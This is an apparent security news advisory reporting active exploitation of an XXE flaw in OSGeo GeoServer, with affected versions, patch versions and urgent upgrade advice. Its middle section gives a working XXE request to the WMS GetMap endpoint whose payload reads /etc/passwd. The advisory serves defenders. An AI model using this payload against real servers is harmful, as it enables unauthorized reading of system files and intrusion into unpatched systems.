CISA reports active exploitation of GeoServer XXE flaw
Take action: If you run OSGeo GeoServer, this is urgent. Your server is under attack. If possible, isolate from the internet. Definitely upgrade to the latest patched version (2.25.6, 2.26.2, 2.27.0, 2.28.0, or 2.28.1).
Learn More
CISA reports active exploitation of a critical security flaw affecting OSGeo GeoServer.
The vulnerability is tracked as CVE-2025-58360 (CVSS score 9.8), is an unauthenticated XML External Entity (XXE) caused by improper restriction of XML external entity references that occurs when GeoServer accepts XML input through a specific endpoint at /geoserver/wms operation GetMap.
Successful exploitation of this XXE vulnerability could enable attackers to access arbitrary files from the server's file system, exposing potentially sensitive configuration data and system information. Additionally, threat actors could leverage the flaw to conduct Server-Side Request Forgery (SSRF) attacks, allowing them to interact with internal systems that would normally be inaccessible from external networks. The vulnerability can also be weaponized to launch denial-of-service (DoS) attacks by exhausting server resources through malicious XML entity expansion, potentially disrupting critical mapping and geographic information services.
Example of the exloit
A legitimate WMS GetMap request to GeoServer might look like:
GET /geoserver/wms?service=WMS&version=1.1.0&request=GetMap&layers=topp:states&styles=&bbox=-124.73,24.96,-66.97,49.37&width=768&height=330&srs=EPSG:4326&format=image/pngMalicious XXE Attack via XML POST: For requests that accept XML input (such as SLD - Styled Layer Descriptor), an attacker could send:
POST /geoserver/wms?service=WMS&request=GetMap HTTP/1.1
Host: vulnerable-geoserver.example.com
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<StyledLayerDescriptor version="1.0.0">
<NamedLayer>
<Name>&xxe;</Name>
<UserStyle>
<Title>Attack Style</Title>
<FeatureTypeStyle>
<Rule>
<PolygonSymbolizer>
<Fill>
<CssParameter name="fill">#FF0000</CssParameter>
</Fill>
</PolygonSymbolizer>
</Rule>
</FeatureTypeStyle>
</UserStyle>
</NamedLayer>
</StyledLayerDescriptor>Affected Packages:
- docker.osgeo.org/geoserver
- org.geoserver.web:gs-web-app (Maven)
- org.geoserver:gs-wms (Maven)
The vulnerability affects all versions of GeoServer up to and including 2.25.5, as well as versions ranging from 2.26.0 through 2.26.1.
OSGeo has released patches to address this security issue in versions 2.25.6, 2.26.2, 2.27.0, 2.28.0, and 2.28.1.
Details about how the vulnerability is being exploited in real-world attacks is not disclosed. The Canadian Centre for Cyber Security issued on November 28, 2025, confirmed that an exploit for CVE-2025-58360 exists in the wild and is being actively used by threat actors.
Federal Civilian Executive Branch (FCEB) agencies have been directed to apply the required security patches by January 1, 2026. Organizations running affected versions of GeoServer should prioritize patching.
